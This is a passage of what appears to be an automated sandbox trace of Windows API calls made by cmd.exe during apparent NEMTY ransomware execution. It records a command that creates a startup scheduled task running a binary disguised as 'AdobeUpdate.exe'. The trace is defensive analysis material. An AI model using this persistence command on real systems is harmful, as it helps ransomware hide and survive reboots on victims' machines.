(HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0068.589] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3efab8 | out: phkResult=0x3efab8*=0x0) returned 0x2 [0068.589] VirtualQuery (in: lpAddress=0x3efaef, lpBuffer=0x3efa88, dwLength=0x1c | out: lpBuffer=0x3efa88*(BaseAddress=0x3ef000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.589] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x3efa88, dwLength=0x1c | out: lpBuffer=0x3efa88*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0068.589] VirtualQuery (in: lpAddress=0x2f1000, lpBuffer=0x3efa88, dwLength=0x1c | out: lpBuffer=0x3efa88*(BaseAddress=0x2f1000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0068.589] VirtualQuery (in: lpAddress=0x2f3000, lpBuffer=0x3efa88, dwLength=0x1c | out: lpBuffer=0x3efa88*(BaseAddress=0x2f3000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.589] VirtualQuery (in: lpAddress=0x3f0000, lpBuffer=0x3efa88, dwLength=0x1c | out: lpBuffer=0x3efa88*(BaseAddress=0x3f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xe0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0068.589] GetConsoleOutputCP () returned 0x1b5 [0068.589] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0068.589] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0068.590] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.590] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0068.590] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.590] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0068.590] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.590] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.590] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.590] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0068.591] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.591] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0068.591] GetEnvironmentStringsW () returned 0x4e2140* [0068.591] GetProcessHeap () returned 0x4d0000 [0068.591] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xaca) returned 0x4e2c18 [0068.591] FreeEnvironmentStringsW (penv=0x4e2140) returned 1 [0068.591] GetProcessHeap () returned 0x4d0000 [0068.591] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x4) returned 0x4e18e0 [0068.591] GetEnvironmentStringsW () returned 0x4e2140* [0068.591] GetProcessHeap () returned 0x4d0000 [0068.591] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xaca) returned 0x4e36f0 [0068.591] FreeEnvironmentStringsW (penv=0x4e2140) returned 1 [0068.591] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3eea28 | out: phkResult=0x3eea28*=0x68) returned 0x0 [0068.592] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3eea30, lpData=0x3eea34, lpcbData=0x3eea2c*=0x1000 | out: lpType=0x3eea30*=0x0, lpData=0x3eea34*=0x0, lpcbData=0x3eea2c*=0x1000) returned 0x2 [0068.592] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3eea30, lpData=0x3eea34, lpcbData=0x3eea2c*=0x1000 | out: lpType=0x3eea30*=0x4, lpData=0x3eea34*=0x1, lpcbData=0x3eea2c*=0x4) returned 0x0 [0068.592] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3eea30, lpData=0x3eea34, lpcbData=0x3eea2c*=0x1000 | out: lpType=0x3eea30*=0x0, lpData=0x3eea34*=0x1, lpcbData=0x3eea2c*=0x1000) returned 0x2 [0068.592] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3eea30, lpData=0x3eea34, lpcbData=0x3eea2c*=0x1000 | out: lpType=0x3eea30*=0x4, lpData=0x3eea34*=0x0, lpcbData=0x3eea2c*=0x4) returned 0x0 [0068.592] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3eea30, lpData=0x3eea34, lpcbData=0x3eea2c*=0x1000 | out: lpType=0x3eea30*=0x4, lpData=0x3eea34*=0x40, lpcbData=0x3eea2c*=0x4) returned 0x0 [0068.592] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3eea30, lpData=0x3eea34, lpcbData=0x3eea2c*=0x1000 | out: lpType=0x3eea30*=0x4, lpData=0x3eea34*=0x40, lpcbData=0x3eea2c*=0x4) returned 0x0 [0068.592] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3eea30, lpData=0x3eea34, lpcbData=0x3eea2c*=0x1000 | out: lpType=0x3eea30*=0x0, lpData=0x3eea34*=0x40, lpcbData=0x3eea2c*=0x1000) returned 0x2 [0068.592] RegCloseKey (hKey=0x68) returned 0x0 [0068.592] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3eea28 | out: phkResult=0x3eea28*=0x68) returned 0x0 [0068.592] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3eea30, lpData=0x3eea34, lpcbData=0x3eea2c*=0x1000 | out: lpType=0x3eea30*=0x0, lpData=0x3eea34*=0x40, lpcbData=0x3eea2c*=0x1000) returned 0x2 [0068.592] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3eea30, lpData=0x3eea34, lpcbData=0x3eea2c*=0x1000 | out: lpType=0x3eea30*=0x4, lpData=0x3eea34*=0x1, lpcbData=0x3eea2c*=0x4) returned 0x0 [0068.592] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3eea30, lpData=0x3eea34, lpcbData=0x3eea2c*=0x1000 | out: lpType=0x3eea30*=0x0, lpData=0x3eea34*=0x1, lpcbData=0x3eea2c*=0x1000) returned 0x2 [0068.592] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3eea30, lpData=0x3eea34, lpcbData=0x3eea2c*=0x1000 | out: lpType=0x3eea30*=0x4, lpData=0x3eea34*=0x0, lpcbData=0x3eea2c*=0x4) returned 0x0 [0068.592] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3eea30, lpData=0x3eea34, lpcbData=0x3eea2c*=0x1000 | out: lpType=0x3eea30*=0x4, lpData=0x3eea34*=0x9, lpcbData=0x3eea2c*=0x4) returned 0x0 [0068.592] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3eea30, lpData=0x3eea34, lpcbData=0x3eea2c*=0x1000 | out: lpType=0x3eea30*=0x4, lpData=0x3eea34*=0x9, lpcbData=0x3eea2c*=0x4) returned 0x0 [0068.592] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3eea30, lpData=0x3eea34, lpcbData=0x3eea2c*=0x1000 | out: lpType=0x3eea30*=0x0, lpData=0x3eea34*=0x9, lpcbData=0x3eea2c*=0x1000) returned 0x2 [0068.592] RegCloseKey (hKey=0x68) returned 0x0 [0068.592] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebb3 [0068.592] srand (_Seed=0x5d97ebb3) [0068.592] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c schtasks.exe /create /sc onstart /tn \"_NEMTY_5Y4CYS9_\" /tr \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe\"" [0068.593] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c schtasks.exe /create /sc onstart /tn \"_NEMTY_5Y4CYS9_\" /tr \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe\"" [0068.593] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.593] GetProcessHeap () returned 0x4d0000 [0068.593] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x210) returned 0x4e2140 [0068.593] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4e2148, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0068.593] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.593] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.593] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.593] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0068.593] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0068.593] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0068.593] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0068.593] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0068.593] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0068.593] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0068.593] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0068.593] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0068.594] GetProcessHeap () returned 0x4d0000 [0068.594] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e2c18 | out: hHeap=0x4d0000) returned 1 [0068.594] GetEnvironmentStringsW () returned 0x4e2358* [0068.594] GetProcessHeap () returned 0x4d0000 [0068.594] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xae2) returned 0x4e4cb8 [0068.594] FreeEnvironmentStringsW (penv=0x4e2358) returned 1 [0068.594] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0068.594] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.594] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0068.594] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0068.594] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0068.594] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0068.594] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0068.594] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0068.594] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0068.594] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0068.594] GetProcessHeap () returned 0x4d0000 [0068.594] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x54) returned 0x4e1810 [0068.594] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3ef7f4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.594] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x3ef7f4, lpFilePart=0x3ef7f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3ef7f0*="Desktop") returned 0x25 [0068.594] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.594] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3ef570 | out: lpFindFileData=0x3ef570*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4e57a8 [0068.595] FindClose (in: hFindFile=0x4e57a8 | out: hFindFile=0x4e57a8) returned 1 [0068.595] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3ef570 | out: lpFindFileData=0x3ef570*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x963e2b90, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x963e2b90, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x4e57a8 [0068.595] FindClose (in: hFindFile=0x4e57a8 | out: hFindFile=0x4e57a8) returned 1 [0068.595] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0068.595] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3ef570 | out: lpFindFileData=0x3ef570*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4e57a8 [0068.595] FindClose (in: hFindFile=0x4e57a8 | out: hFindFile=0x4e57a8) returned 1 [0068.595] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.595] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0068.595] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0068.595] GetProcessHeap () returned 0x4d0000 [0068.595] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e4cb8 | out: hHeap=0x4d0000) returned 1 [0068.595] GetEnvironmentStringsW () returned 0x4e41c8* [0068.595] GetProcessHeap () returned 0x4d0000 [0068.595] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xb36) returned 0x4e5fe8 [0068.596] FreeEnvironmentStringsW (penv=0x4e41c8) returned 1 [0068.596] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.596] GetProcessHeap () returned 0x4d0000 [0068.596] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e1810 | out: hHeap=0x4d0000) returned 1 [0068.596] GetProcessHeap () returned 0x4d0000 [0068.596] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x400e) returned 0x4e6b28 [0068.596] GetProcessHeap () returned 0x4d0000 [0068.596] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xe2) returned 0x4e2e98 [0068.596] GetProcessHeap () returned 0x4d0000 [0068.596] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e6b28 | out: hHeap=0x4d0000) returned 1 [0068.596] GetConsoleOutputCP () returned 0x1b5 [0069.306] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0069.306] GetUserDefaultLCID () returned 0x409 [0069.307] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0069.307] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3ef934, cchData=128 | out: lpLCData="0") returned 2 [0069.307] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3ef934, cchData=128 | out: lpLCData="0") returned 2 [0069.307] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3ef934, cchData=128 | out: lpLCData="1") returned 2 [0069.307] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0069.307] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0069.307] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0069.307] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0069.307] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0069.307] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0069.307] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0069.307] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0069.307] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0069.307] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0069.307] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0069.308] GetProcessHeap () returned 0x4d0000 [0069.308] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20c) returned 0x4e2f88 [0069.309] GetConsoleTitleW (in: lpConsoleTitle=0x4e2f88, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.309] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0069.309] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0069.309] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0069.309] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0069.309] GetProcessHeap () returned 0x4d0000 [0069.309] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x400a) returned 0x4e6b28 [0069.309] GetProcessHeap () returned 0x4d0000 [0069.309] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e6b28 | out: hHeap=0x4d0000) returned 1 [0069.310] _wcsicmp (_String1="schtasks.exe", _String2=")") returned 74 [0069.310] _wcsicmp (_String1="FOR", _String2="schtasks.exe") returned -13 [0069.310] _wcsicmp (_String1="FOR/?", _String2="schtasks.exe") returned -13 [0069.310] _wcsicmp (_String1="IF", _String2="schtasks.exe") returned -10 [0069.310] _wcsicmp (_String1="IF/?", _String2="schtasks.exe") returned -10 [0069.310] _wcsicmp (_String1="REM", _String2="schtasks.exe") returned -1 [0069.310] _wcsicmp (_String1="REM/?", _String2="schtasks.exe") returned -1 [0069.310] GetProcessHeap () returned 0x4d0000 [0069.310] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x58) returned 0x4e31a0 [0069.310] GetProcessHeap () returned 0x4d0000 [0069.310] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x22) returned 0x4e1848 [0069.312] GetProcessHeap () returned 0x4d0000 [0069.313] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xc6) returned 0x4e3200 [0069.313] GetConsoleTitleW (in: lpConsoleTitle=0x3ef62c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.314] GetFileAttributesW (lpFileName="schtasks.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\schtasks.exe")) returned 0xffffffff [0069.314] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0069.314] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0069.314] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0069.314] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0069.314] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0069.314] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0069.315] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0069.315] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0069.315] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0069.315] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0069.315] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0069.315] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0069.315] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0069.315] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0069.315] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0069.315] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0069.315] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0069.315] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0069.315] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0069.315] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0069.315] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0069.315] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0069.315] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0069.315] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0069.315] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0069.315] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0069.315] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0069.315] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0069.315] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0069.315] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0069.315] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0069.315] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0069.315] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0069.315] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0069.315] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0069.315] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0069.315] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0069.315] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0069.315] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0069.315] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0069.315] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0069.316] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0069.316] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0069.316] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0069.316] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0069.316] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0069.316] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0069.316] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0069.316] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0069.316] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0069.316] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0069.316] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0069.316] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0069.316] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0069.316] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0069.316] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0069.316] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0069.316] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0069.316] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0069.316] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0069.316] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0069.316] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0069.316] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0069.316] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0069.316] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0069.316] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0069.316] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0069.316] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0069.316] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0069.316] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0069.316] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0069.316] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0069.316] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0069.316] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0069.316] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0069.316] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0069.317] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0069.317] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0069.317] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0069.317] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0069.317] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0069.317] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0069.317] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0069.317] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0069.317] _wcsicmp (_String1="schtasks", _String2="FOR") returned 13 [0069.317] _wcsicmp (_String1="schtasks", _String2="IF") returned 10 [0069.317] _wcsicmp (_String1="schtasks", _String2="REM") returned 1 [0069.317] GetProcessHeap () returned 0x4d0000 [0069.317] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x210) returned 0x4e32d0 [0069.317] GetProcessHeap () returned 0x4d0000 [0069.317] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xe0) returned 0x4e34e8 [0069.317] _wcsnicmp (_String1="scht", _String2="cmd ", _MaxCount=0x4) returned 16 [0069.318] GetProcessHeap () returned 0x4d0000 [0069.318] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x418) returned 0x4d07f0 [0069.318] SetErrorMode (uMode=0x0) returned 0x0 [0069.318] SetErrorMode (uMode=0x1) returned 0x0 [0069.318] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4d07f8, lpFilePart=0x3ef14c | out: 